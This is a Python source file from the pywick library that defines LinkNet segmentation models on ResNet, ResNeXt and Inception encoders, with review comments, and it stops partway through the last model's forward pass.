0a08f166d76bf6367eb20f683b5fd76b0e63fbb0
| 44,166
|
py
|
Python
|
pywick/models/segmentation/mnas_linknets/linknet.py
|
ashishpatel26/pywick
|
1afffd1c21c2b188836d3599e802146182757bb5
|
[
"MIT"
] | 2
|
2020-11-28T07:56:09.000Z
|
2021-11-08T09:30:39.000Z
|
pywick/models/segmentation/mnas_linknets/linknet.py
|
ashishpatel26/pywick
|
1afffd1c21c2b188836d3599e802146182757bb5
|
[
"MIT"
] | null | null | null |
pywick/models/segmentation/mnas_linknets/linknet.py
|
ashishpatel26/pywick
|
1afffd1c21c2b188836d3599e802146182757bb5
|
[
"MIT"
] | null | null | null |
# Source: https://github.com/snakers4/mnasnet-pytorch/blob/master/src/models/linknet.py
"""
Implementation of `LinkNet: Exploiting Encoder Representations for Efficient Semantic Segmentation <https://arxiv.org/abs/1707.03718>`_
"""
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models
from .resnext import resnext101_32x4d
from .inception_resnet import inceptionresnetv2
from .inception4 import inceptionv4
from .decoder import DecoderBlockLinkNetV2 as DecoderBlock
from .decoder import DecoderBlockLinkNetInceptionV2 as DecoderBlockInception
__all__ = ['LinkCeption', 'LinkDenseNet121', 'LinkDenseNet161', 'LinkInceptionResNet', 'LinkNet18', 'LinkNet34', 'LinkNet50', 'LinkNet101', 'LinkNet152', 'LinkNeXt', 'CoarseLinkNet50']
nonlinearity = nn.ReLU
class BasicConv2d(nn.Module):
    """Conv2d -> BatchNorm2d -> ReLU building block (bias-free convolution)."""

    def __init__(self, in_planes, out_planes, kernel_size, stride, padding=0):
        super().__init__()
        # Bias is omitted because the following BatchNorm has its own shift.
        self.conv = nn.Conv2d(
            in_planes,
            out_planes,
            kernel_size=kernel_size,
            stride=stride,
            padding=padding,
            bias=False,
        )
        # eps matches the TensorFlow default; momentum is PyTorch's default.
        self.bn = nn.BatchNorm2d(out_planes, eps=0.001, momentum=0.1, affine=True)
        self.relu = nn.ReLU(inplace=False)

    def forward(self, x):
        """Apply convolution, batch normalization, and ReLU in sequence."""
        return self.relu(self.bn(self.conv(x)))
class LinkNet18(nn.Module):
    """LinkNet segmentation model with a ResNet-18 encoder.

    Decoder blocks upsample and are summed with the matching encoder stage
    outputs (additive skip connections); a small transposed-conv head emits
    `num_classes` channels. `self.mean`/`self.std` expose the ImageNet
    normalization constants for callers.
    """
    def __init__(self,
                 num_classes,
                 pretrained=True,
                 num_channels=3,
                 is_deconv=False,
                 decoder_kernel_size=4,
                 **kwargs
                 ):
        super().__init__()
        # Channel widths of resnet18's four residual stages.
        filters = [64, 128, 256, 512]
        resnet = models.resnet18(pretrained=pretrained)
        self.mean = (0.485, 0.456, 0.406)
        self.std = (0.229, 0.224, 0.225)
        if num_channels == 3:
            self.firstconv = resnet.conv1
        else:
            # Non-RGB input: replace the stem conv (pretrained stem weights are lost).
            self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
        self.firstbn = resnet.bn1
        self.firstrelu = resnet.relu
        self.firstmaxpool = resnet.maxpool
        self.encoder1 = resnet.layer1
        self.encoder2 = resnet.layer2
        self.encoder3 = resnet.layer3
        self.encoder4 = resnet.layer4
        # Decoder
        self.decoder4 = DecoderBlock(in_channels=filters[3],
                                     n_filters=filters[2],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder3 = DecoderBlock(in_channels=filters[2],
                                     n_filters=filters[1],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder2 = DecoderBlock(in_channels=filters[1],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder1 = DecoderBlock(in_channels=filters[0],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        # Final Classifier
        self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
        self.finalrelu1 = nonlinearity(inplace=True)
        self.finalconv2 = nn.Conv2d(32, 32, 3)
        self.finalrelu2 = nonlinearity(inplace=True)
        self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
    def freeze(self):
        """Disable gradients for all encoder parameters."""
        self.require_encoder_grad(False)
    def unfreeze(self):
        """Re-enable gradients for all encoder parameters."""
        self.require_encoder_grad(True)
    def require_encoder_grad(self, requires_grad):
        """Set `requires_grad` on every parameter of the encoder blocks."""
        blocks = [self.firstconv,
                  self.encoder1,
                  self.encoder2,
                  self.encoder3,
                  self.encoder4]
        for block in blocks:
            for p in block.parameters():
                p.requires_grad = requires_grad
    # noinspection PyCallingNonCallable
    def forward(self, x):
        """Encoder -> decoder with additive skips -> classifier head."""
        # Encoder
        x = self.firstconv(x)
        x = self.firstbn(x)
        x = self.firstrelu(x)
        x = self.firstmaxpool(x)
        e1 = self.encoder1(x)
        e2 = self.encoder2(e1)
        e3 = self.encoder3(e2)
        e4 = self.encoder4(e3)
        # Decoder with Skip Connections
        d4 = self.decoder4(e4) + e3
        d3 = self.decoder3(d4) + e2
        d2 = self.decoder2(d3) + e1
        d1 = self.decoder1(d2)
        # Final Classification
        f1 = self.finaldeconv1(d1)
        f2 = self.finalrelu1(f1)
        f3 = self.finalconv2(f2)
        f4 = self.finalrelu2(f3)
        f5 = self.finalconv3(f4)
        return f5
class LinkNet34(nn.Module):
    """LinkNet segmentation model with a ResNet-34 encoder.

    Structure is identical to LinkNet18 apart from the backbone; see that
    class for the decoder/skip-connection layout.
    """
    def __init__(self,
                 num_classes,
                 pretrained=True,
                 num_channels=3,
                 is_deconv=False,
                 decoder_kernel_size=4,
                 **kwargs
                 ):
        super().__init__()
        # Channel widths of resnet34's four residual stages.
        filters = [64, 128, 256, 512]
        resnet = models.resnet34(pretrained=pretrained)
        self.mean = (0.485, 0.456, 0.406)
        self.std = (0.229, 0.224, 0.225)
        if num_channels == 3:
            self.firstconv = resnet.conv1
        else:
            # Non-RGB input: replace the stem conv (pretrained stem weights are lost).
            self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
        self.firstbn = resnet.bn1
        self.firstrelu = resnet.relu
        self.firstmaxpool = resnet.maxpool
        self.encoder1 = resnet.layer1
        self.encoder2 = resnet.layer2
        self.encoder3 = resnet.layer3
        self.encoder4 = resnet.layer4
        # Decoder
        self.decoder4 = DecoderBlock(in_channels=filters[3],
                                     n_filters=filters[2],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder3 = DecoderBlock(in_channels=filters[2],
                                     n_filters=filters[1],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder2 = DecoderBlock(in_channels=filters[1],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder1 = DecoderBlock(in_channels=filters[0],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        # Final Classifier
        self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
        self.finalrelu1 = nonlinearity(inplace=True)
        self.finalconv2 = nn.Conv2d(32, 32, 3)
        self.finalrelu2 = nonlinearity(inplace=True)
        self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
    def freeze(self):
        """Disable gradients for all encoder parameters."""
        self.require_encoder_grad(False)
    def unfreeze(self):
        """Re-enable gradients for all encoder parameters."""
        self.require_encoder_grad(True)
    def require_encoder_grad(self, requires_grad):
        """Set `requires_grad` on every parameter of the encoder blocks."""
        blocks = [self.firstconv,
                  self.encoder1,
                  self.encoder2,
                  self.encoder3,
                  self.encoder4]
        for block in blocks:
            for p in block.parameters():
                p.requires_grad = requires_grad
    # noinspection PyCallingNonCallable
    def forward(self, x):
        """Encoder -> decoder with additive skips -> classifier head."""
        # Encoder
        x = self.firstconv(x)
        x = self.firstbn(x)
        x = self.firstrelu(x)
        x = self.firstmaxpool(x)
        e1 = self.encoder1(x)
        e2 = self.encoder2(e1)
        e3 = self.encoder3(e2)
        e4 = self.encoder4(e3)
        # Decoder with Skip Connections
        d4 = self.decoder4(e4) + e3
        d3 = self.decoder3(d4) + e2
        d2 = self.decoder2(d3) + e1
        d1 = self.decoder1(d2)
        # Final Classification
        f1 = self.finaldeconv1(d1)
        f2 = self.finalrelu1(f1)
        f3 = self.finalconv2(f2)
        f4 = self.finalrelu2(f3)
        f5 = self.finalconv3(f4)
        return f5
class LinkNet50(nn.Module):
    """LinkNet segmentation model with a ResNet-50 (bottleneck) encoder.

    Same layout as LinkNet18/34 but with the wider bottleneck channel
    counts of ResNet-50.
    """
    def __init__(self,
                 num_classes,
                 pretrained=True,
                 num_channels=3,
                 is_deconv=False,
                 decoder_kernel_size=4,
                 **kwargs
                 ):
        super().__init__()
        # Channel widths of resnet50's four bottleneck stages.
        filters = [256, 512, 1024, 2048]
        resnet = models.resnet50(pretrained=pretrained)
        self.mean = (0.485, 0.456, 0.406)
        self.std = (0.229, 0.224, 0.225)
        if num_channels == 3:
            self.firstconv = resnet.conv1
        else:
            # Non-RGB input: replace the stem conv (pretrained stem weights are lost).
            self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
        self.firstbn = resnet.bn1
        self.firstrelu = resnet.relu
        self.firstmaxpool = resnet.maxpool
        self.encoder1 = resnet.layer1
        self.encoder2 = resnet.layer2
        self.encoder3 = resnet.layer3
        self.encoder4 = resnet.layer4
        # Decoder
        self.decoder4 = DecoderBlock(in_channels=filters[3],
                                     n_filters=filters[2],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder3 = DecoderBlock(in_channels=filters[2],
                                     n_filters=filters[1],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder2 = DecoderBlock(in_channels=filters[1],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder1 = DecoderBlock(in_channels=filters[0],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        # Final Classifier
        self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
        self.finalrelu1 = nonlinearity(inplace=True)
        self.finalconv2 = nn.Conv2d(32, 32, 3)
        self.finalrelu2 = nonlinearity(inplace=True)
        self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
    def freeze(self):
        """Disable gradients for all encoder parameters."""
        self.require_encoder_grad(False)
    def unfreeze(self):
        """Re-enable gradients for all encoder parameters."""
        self.require_encoder_grad(True)
    def require_encoder_grad(self, requires_grad):
        """Set `requires_grad` on every parameter of the encoder blocks."""
        blocks = [self.firstconv,
                  self.encoder1,
                  self.encoder2,
                  self.encoder3,
                  self.encoder4]
        for block in blocks:
            for p in block.parameters():
                p.requires_grad = requires_grad
    # noinspection PyCallingNonCallable
    def forward(self, x):
        """Encoder -> decoder with additive skips -> classifier head."""
        # Encoder
        x = self.firstconv(x)
        x = self.firstbn(x)
        x = self.firstrelu(x)
        x = self.firstmaxpool(x)
        e1 = self.encoder1(x)
        e2 = self.encoder2(e1)
        e3 = self.encoder3(e2)
        e4 = self.encoder4(e3)
        # Decoder with Skip Connections
        d4 = self.decoder4(e4) + e3
        d3 = self.decoder3(d4) + e2
        d2 = self.decoder2(d3) + e1
        d1 = self.decoder1(d2)
        # Final Classification
        f1 = self.finaldeconv1(d1)
        f2 = self.finalrelu1(f1)
        f3 = self.finalconv2(f2)
        f4 = self.finalrelu2(f3)
        f5 = self.finalconv3(f4)
        return f5
class LinkNet101(nn.Module):
    """LinkNet segmentation model with a ResNet-101 (bottleneck) encoder.

    Identical structure to LinkNet50; only the backbone depth differs.
    """
    def __init__(self,
                 num_classes,
                 pretrained=True,
                 num_channels=3,
                 is_deconv=False,
                 decoder_kernel_size=4,
                 **kwargs
                 ):
        super().__init__()
        # Channel widths of resnet101's four bottleneck stages.
        filters = [256, 512, 1024, 2048]
        resnet = models.resnet101(pretrained=pretrained)
        self.mean = (0.485, 0.456, 0.406)
        self.std = (0.229, 0.224, 0.225)
        if num_channels == 3:
            self.firstconv = resnet.conv1
        else:
            # Non-RGB input: replace the stem conv (pretrained stem weights are lost).
            self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
        self.firstbn = resnet.bn1
        self.firstrelu = resnet.relu
        self.firstmaxpool = resnet.maxpool
        self.encoder1 = resnet.layer1
        self.encoder2 = resnet.layer2
        self.encoder3 = resnet.layer3
        self.encoder4 = resnet.layer4
        # Decoder
        self.decoder4 = DecoderBlock(in_channels=filters[3],
                                     n_filters=filters[2],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder3 = DecoderBlock(in_channels=filters[2],
                                     n_filters=filters[1],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder2 = DecoderBlock(in_channels=filters[1],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder1 = DecoderBlock(in_channels=filters[0],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        # Final Classifier
        self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
        self.finalrelu1 = nonlinearity(inplace=True)
        self.finalconv2 = nn.Conv2d(32, 32, 3)
        self.finalrelu2 = nonlinearity(inplace=True)
        self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
    def freeze(self):
        """Disable gradients for all encoder parameters."""
        self.require_encoder_grad(False)
    def unfreeze(self):
        """Re-enable gradients for all encoder parameters."""
        self.require_encoder_grad(True)
    def require_encoder_grad(self, requires_grad):
        """Set `requires_grad` on every parameter of the encoder blocks."""
        blocks = [self.firstconv,
                  self.encoder1,
                  self.encoder2,
                  self.encoder3,
                  self.encoder4]
        for block in blocks:
            for p in block.parameters():
                p.requires_grad = requires_grad
    # noinspection PyCallingNonCallable
    def forward(self, x):
        """Encoder -> decoder with additive skips -> classifier head."""
        # Encoder
        x = self.firstconv(x)
        x = self.firstbn(x)
        x = self.firstrelu(x)
        x = self.firstmaxpool(x)
        e1 = self.encoder1(x)
        e2 = self.encoder2(e1)
        e3 = self.encoder3(e2)
        e4 = self.encoder4(e3)
        # Decoder with Skip Connections
        d4 = self.decoder4(e4) + e3
        d3 = self.decoder3(d4) + e2
        d2 = self.decoder2(d3) + e1
        d1 = self.decoder1(d2)
        # Final Classification
        f1 = self.finaldeconv1(d1)
        f2 = self.finalrelu1(f1)
        f3 = self.finalconv2(f2)
        f4 = self.finalrelu2(f3)
        f5 = self.finalconv3(f4)
        return f5
class LinkNeXt(nn.Module):
    """LinkNet segmentation model with a ResNeXt-101 (32x4d) encoder.

    NOTE(review): `pretrained`, `num_channels`, and **kwargs are accepted for
    API parity with the other LinkNets but are unused here -- the ResNeXt
    backbone is always loaded with ImageNet weights for 3-channel input.
    """
    def __init__(self,
                 num_classes,
                 pretrained=True,
                 num_channels=3,
                 is_deconv=False,
                 decoder_kernel_size=4,
                 **kwargs
                 ):
        super().__init__()
        # Channel widths of the four ResNeXt stages.
        filters = [256, 512, 1024, 2048]
        # only pretrained
        resnet = resnext101_32x4d(num_classes=1000, pretrained='imagenet')
        self.mean = (0.485, 0.456, 0.406)
        self.std = (0.229, 0.224, 0.225)
        # Stem replaces the firstconv/bn/relu/maxpool split used by the ResNet variants.
        self.stem = resnet.stem
        self.encoder1 = resnet.layer1
        self.encoder2 = resnet.layer2
        self.encoder3 = resnet.layer3
        self.encoder4 = resnet.layer4
        # Decoder
        self.decoder4 = DecoderBlock(in_channels=filters[3],
                                     n_filters=filters[2],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder3 = DecoderBlock(in_channels=filters[2],
                                     n_filters=filters[1],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder2 = DecoderBlock(in_channels=filters[1],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder1 = DecoderBlock(in_channels=filters[0],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        # Final Classifier
        self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
        self.finalrelu1 = nonlinearity(inplace=True)
        self.finalconv2 = nn.Conv2d(32, 32, 3)
        self.finalrelu2 = nonlinearity(inplace=True)
        self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
    def freeze(self):
        """Disable gradients for all encoder parameters."""
        self.require_encoder_grad(False)
    def unfreeze(self):
        """Re-enable gradients for all encoder parameters."""
        self.require_encoder_grad(True)
    def require_encoder_grad(self, requires_grad):
        """Set `requires_grad` on every parameter of the encoder blocks."""
        blocks = [self.stem,
                  self.encoder1,
                  self.encoder2,
                  self.encoder3,
                  self.encoder4]
        for block in blocks:
            for p in block.parameters():
                p.requires_grad = requires_grad
    # noinspection PyCallingNonCallable
    def forward(self, x):
        """Encoder -> decoder with additive skips -> classifier head (raw logits)."""
        # Encoder
        x = self.stem(x)
        e1 = self.encoder1(x)
        e2 = self.encoder2(e1)
        e3 = self.encoder3(e2)
        e4 = self.encoder4(e3)
        # Decoder with Skip Connections
        d4 = self.decoder4(e4) + e3
        d3 = self.decoder3(d4) + e2
        d2 = self.decoder2(d3) + e1
        d1 = self.decoder1(d2)
        # Final Classification
        f1 = self.finaldeconv1(d1)
        f2 = self.finalrelu1(f1)
        f3 = self.finalconv2(f2)
        f4 = self.finalrelu2(f3)
        f5 = self.finalconv3(f4)
        # Logits are returned unactivated; apply sigmoid/softmax in the loss or caller.
        return f5
class LinkNet152(nn.Module):
    """LinkNet segmentation model with a ResNet-152 (bottleneck) encoder.

    NOTE(review): default `decoder_kernel_size` is 3 here while the sibling
    classes default to 4 -- presumably intentional, but worth confirming.
    """
    def __init__(self,
                 num_classes,
                 pretrained=True,
                 num_channels=3,
                 is_deconv=False,
                 decoder_kernel_size=3,
                 **kwargs
                 ):
        super().__init__()
        # Channel widths of resnet152's four bottleneck stages.
        filters = [256, 512, 1024, 2048]
        resnet = models.resnet152(pretrained=pretrained)
        self.mean = (0.485, 0.456, 0.406)
        self.std = (0.229, 0.224, 0.225)
        if num_channels == 3:
            self.firstconv = resnet.conv1
        else:
            # Non-RGB input: replace the stem conv (pretrained stem weights are lost).
            self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
        self.firstbn = resnet.bn1
        self.firstrelu = resnet.relu
        self.firstmaxpool = resnet.maxpool
        self.encoder1 = resnet.layer1
        self.encoder2 = resnet.layer2
        self.encoder3 = resnet.layer3
        self.encoder4 = resnet.layer4
        # Decoder
        self.decoder4 = DecoderBlock(in_channels=filters[3],
                                     n_filters=filters[2],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder3 = DecoderBlock(in_channels=filters[2],
                                     n_filters=filters[1],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder2 = DecoderBlock(in_channels=filters[1],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        self.decoder1 = DecoderBlock(in_channels=filters[0],
                                     n_filters=filters[0],
                                     kernel_size=decoder_kernel_size,
                                     is_deconv=is_deconv)
        # Final Classifier
        self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
        self.finalrelu1 = nonlinearity(inplace=True)
        self.finalconv2 = nn.Conv2d(32, 32, 3)
        self.finalrelu2 = nonlinearity(inplace=True)
        self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
    def freeze(self):
        """Disable gradients for all encoder parameters."""
        self.require_encoder_grad(False)
    def unfreeze(self):
        """Re-enable gradients for all encoder parameters."""
        self.require_encoder_grad(True)
    def require_encoder_grad(self, requires_grad):
        """Set `requires_grad` on every parameter of the encoder blocks."""
        blocks = [self.firstconv,
                  self.encoder1,
                  self.encoder2,
                  self.encoder3,
                  self.encoder4]
        for block in blocks:
            for p in block.parameters():
                p.requires_grad = requires_grad
    # noinspection PyCallingNonCallable
    def forward(self, x):
        """Encoder -> decoder with additive skips -> classifier head."""
        # Encoder
        x = self.firstconv(x)
        x = self.firstbn(x)
        x = self.firstrelu(x)
        x = self.firstmaxpool(x)
        e1 = self.encoder1(x)
        e2 = self.encoder2(e1)
        e3 = self.encoder3(e2)
        e4 = self.encoder4(e3)
        # Decoder with Skip Connections
        d4 = self.decoder4(e4) + e3
        d3 = self.decoder3(d4) + e2
        d2 = self.decoder2(d3) + e1
        d1 = self.decoder1(d2)
        # Final Classification
        f1 = self.finaldeconv1(d1)
        f2 = self.finalrelu1(f1)
        f3 = self.finalconv2(f2)
        f4 = self.finalrelu2(f3)
        f5 = self.finalconv3(f4)
        return f5
class LinkCeption(nn.Module):
    """LinkNet-style segmentation model with an Inception-v4 encoder.

    Encoder features from the Inception stem and blocks are decoded with
    transposed-conv decoder blocks and cropped additive skip connections
    (Inception feature maps do not align exactly, so each decoder output is
    cropped to the skip's spatial size). Output is bilinearly resized back
    to the input resolution.

    NOTE(review): `pretrained` and **kwargs are accepted for API parity but
    unused -- the backbone is always loaded with ImageNet weights.
    """
    def __init__(self,
                 num_classes,
                 pretrained=True,
                 num_channels=3,
                 is_deconv=False,
                 decoder_kernel_size=4,
                 **kwargs
                 ):
        super().__init__()
        # Inception networks use (0.5, 0.5, 0.5) normalization, not ImageNet stats.
        self.mean = (0.5, 0.5, 0.5)
        self.std = (0.5, 0.5, 0.5)
        # Channel widths at each tapped point of the inceptionv4 feature stack.
        filters = [64, 384, 384, 1024, 1536]
        # only pre-trained
        inception = inceptionv4(pretrained='imagenet')
        if num_channels == 3:
            self.stem1 = nn.Sequential(
                inception.features[0],
                inception.features[1],
                inception.features[2],
            )
        else:
            # Non-RGB input: replace only the first conv (its pretrained weights are lost).
            self.stem1 = nn.Sequential(
                BasicConv2d(num_channels, 32, kernel_size=3, stride=2),
                inception.features[1],
                inception.features[2],
            )
        self.stem2 = nn.Sequential(
            inception.features[3],
            inception.features[4],
            inception.features[5],
        )
        self.block1 = nn.Sequential(
            inception.features[6],
            inception.features[7],
            inception.features[8],
            inception.features[9],
        )
        # tr1/tr2 are the reduction ("transition") modules between Inception blocks.
        self.tr1 = inception.features[10]
        self.block2 = nn.Sequential(
            inception.features[11],
            inception.features[12],
            inception.features[13],
            inception.features[14],
            inception.features[15],
            inception.features[16],
            inception.features[17],
        )
        self.tr2 = inception.features[18]
        self.block3 = nn.Sequential(
            inception.features[19],
            inception.features[20],
            inception.features[21]
        )
        # Decoder
        self.decoder4 = DecoderBlockInception(in_channels=filters[4],
                                              out_channels=filters[3],
                                              n_filters=filters[3],
                                              last_padding=0,
                                              kernel_size=decoder_kernel_size,
                                              is_deconv=is_deconv)
        self.decoder3 = DecoderBlockInception(in_channels=filters[3],
                                              out_channels=filters[2],
                                              n_filters=filters[2],
                                              last_padding=0,
                                              kernel_size=decoder_kernel_size,
                                              is_deconv=is_deconv)
        self.decoder2 = DecoderBlockInception(in_channels=filters[2],
                                              out_channels=filters[1],
                                              n_filters=filters[1],
                                              last_padding=0,
                                              kernel_size=decoder_kernel_size,
                                              is_deconv=is_deconv)
        self.decoder1 = DecoderBlockInception(in_channels=filters[1],
                                              out_channels=filters[0],
                                              n_filters=filters[0],
                                              last_padding=0,
                                              kernel_size=decoder_kernel_size,
                                              is_deconv=is_deconv)
        # Final Classifier
        self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 1, stride=2)
        self.finalnorm1 = nn.BatchNorm2d(32)
        self.finalrelu1 = nonlinearity(inplace=True)
        self.finalconv2 = nn.Conv2d(32, 32, 3)
        self.finalnorm2 = nn.BatchNorm2d(32)
        self.finalrelu2 = nonlinearity(inplace=True)
        self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=0)
    def freeze(self):
        """Disable gradients for all encoder parameters."""
        self.require_encoder_grad(False)
    def unfreeze(self):
        """Re-enable gradients for all encoder parameters."""
        self.require_encoder_grad(True)
    def require_encoder_grad(self, requires_grad):
        """Set `requires_grad` on every parameter of the encoder blocks."""
        blocks = [self.stem1,
                  self.stem2,
                  self.block1,
                  self.tr1,
                  self.block2,
                  self.tr2,
                  self.block3]
        for block in blocks:
            for p in block.parameters():
                p.requires_grad = requires_grad
    # noinspection PyCallingNonCallable
    def forward(self, x):
        """Encoder -> cropped-skip decoder -> classifier, resized to input shape."""
        final_shape = x.shape[2:]
        # Encoder
        x = self.stem1(x)
        e1 = self.stem2(x)
        e2 = self.block1(e1)
        e3 = self.tr1(e2)
        e3 = self.block2(e3)
        e4 = self.tr2(e3)
        e4 = self.block3(e4)
        # Decoder: crop each upsampled map to the skip's spatial size, then add.
        d4 = self.decoder4(e4)[:, :, 0:e3.size(2), 0:e3.size(3)] + e3
        d3 = self.decoder3(d4)[:, :, 0:e2.size(2), 0:e2.size(3)] + e2
        # FIX: hoist decoder2(e1) -- the original evaluated it three times per
        # forward pass, wasting compute and (in train mode) updating decoder2's
        # BatchNorm running statistics three times instead of once.
        skip2 = self.decoder2(e1)
        d2 = self.decoder2(d3)[:, :, 0:skip2.size(2), 0:skip2.size(3)] + skip2
        d1 = self.decoder1(d2)
        # Final Classification
        f1 = self.finaldeconv1(d1)
        f1 = self.finalnorm1(f1)
        f2 = self.finalrelu1(f1)
        f2 = self.finalnorm2(f2)
        f3 = self.finalconv2(f2)
        f4 = self.finalrelu2(f3)
        f5 = self.finalconv3(f4)
        # align_corners=False is the F.interpolate default; stated explicitly.
        out = F.interpolate(f5, size=final_shape, mode="bilinear", align_corners=False)
        return out
class LinkInceptionResNet(nn.Module):
    """LinkNet-style segmentation model with an Inception-ResNet-v2 encoder.

    Decoder outputs are cropped to each skip connection's spatial size
    before the additive merge (Inception feature maps do not align exactly).
    """
    def __init__(self,
                 num_classes,
                 pretrained=True,
                 num_channels=3,
                 is_deconv=False,
                 decoder_kernel_size=3,
                 **kwargs
                 ):
        super().__init__()
        self.mean = (0.485, 0.456, 0.406)
        self.std = (0.229, 0.224, 0.225)
        # Channel widths at the tapped points of the inceptionresnetv2 stack.
        filters = [64, 192, 320, 1088, 2080]
        # only pre-trained
        ir = inceptionresnetv2(pretrained='imagenet', num_classes=1000)
        if num_channels == 3:
            self.stem1 = nn.Sequential(
                ir.conv2d_1a,
                ir.conv2d_2a,
                ir.conv2d_2b,
            )
        else:
            # Non-RGB input: replace only the first conv (its pretrained weights are lost).
            self.stem1 = nn.Sequential(
                BasicConv2d(num_channels, 32, kernel_size=3, stride=2),
                ir.conv2d_2a,
                ir.conv2d_2b,
            )
        self.maxpool_3a = ir.maxpool_3a
        self.stem2 = nn.Sequential(
            ir.conv2d_3b,
            ir.conv2d_4a,
        )
        # NOTE(review): maxpool_5a is registered here but never used in
        # forward(), which reuses maxpool_3a for the second pooling -- confirm
        # whether that is intentional upstream behavior.
        self.maxpool_5a = ir.maxpool_5a
        self.mixed_5b = ir.mixed_5b
        self.mixed_6a = ir.mixed_6a
        self.mixed_7a = ir.mixed_7a
        # skip1-3 are the repeated Inception-ResNet blocks tapped as skip features.
        self.skip1 = ir.repeat
        self.skip2 = ir.repeat_1
        self.skip3 = ir.repeat_2
        # Decoder
        self.decoder3 = DecoderBlockInception(in_channels=filters[4],
                                              out_channels=filters[3],
                                              n_filters=filters[3],
                                              last_padding=0,
                                              kernel_size=decoder_kernel_size,
                                              is_deconv=is_deconv)
        self.decoder2 = DecoderBlockInception(in_channels=filters[3],
                                              out_channels=filters[2],
                                              n_filters=filters[2],
                                              last_padding=0,
                                              kernel_size=decoder_kernel_size,
                                              is_deconv=is_deconv)
        self.decoder1 = DecoderBlockInception(in_channels=filters[2],
                                              out_channels=filters[1],
                                              n_filters=filters[1],
                                              last_padding=0,
                                              kernel_size=decoder_kernel_size,
                                              is_deconv=is_deconv)
        self.decoder0 = DecoderBlockInception(in_channels=filters[1],
                                              out_channels=filters[0],
                                              n_filters=filters[0],
                                              last_padding=2,
                                              kernel_size=decoder_kernel_size,
                                              is_deconv=is_deconv)
        # Final Classifier
        self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
        self.finalnorm1 = nn.BatchNorm2d(32)
        self.finalrelu1 = nonlinearity(inplace=True)
        self.finalconv2 = nn.Conv2d(32, 32, 3)
        self.finalnorm2 = nn.BatchNorm2d(32)
        self.finalrelu2 = nonlinearity(inplace=True)
        self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
    def freeze(self):
        """Disable gradients for all encoder parameters."""
        self.require_encoder_grad(False)
    def unfreeze(self):
        """Re-enable gradients for all encoder parameters."""
        self.require_encoder_grad(True)
    def require_encoder_grad(self, requires_grad):
        """Set `requires_grad` on every parameter of the encoder blocks."""
        blocks = [self.stem1,
                  self.stem2,
                  self.mixed_5b,
                  self.mixed_6a,
                  self.mixed_7a,
                  self.skip1,
                  self.skip2,
                  self.skip3]
        for block in blocks:
            for p in block.parameters():
                p.requires_grad = requires_grad
    # noinspection PyCallingNonCallable
    def forward(self, x):
        """Encoder -> cropped-skip decoder -> classifier head."""
        # Encoder
        x = self.stem1(x)
        x1 = self.maxpool_3a(x)
        x1 = self.stem2(x1)
        # NOTE(review): reuses maxpool_3a here although maxpool_5a exists -- see __init__.
        x2 = self.maxpool_3a(x1)
        x2 = self.mixed_5b(x2)
        e1 = self.skip1(x2)
        e1_resume = self.mixed_6a(e1)
        e2 = self.skip2(e1_resume)
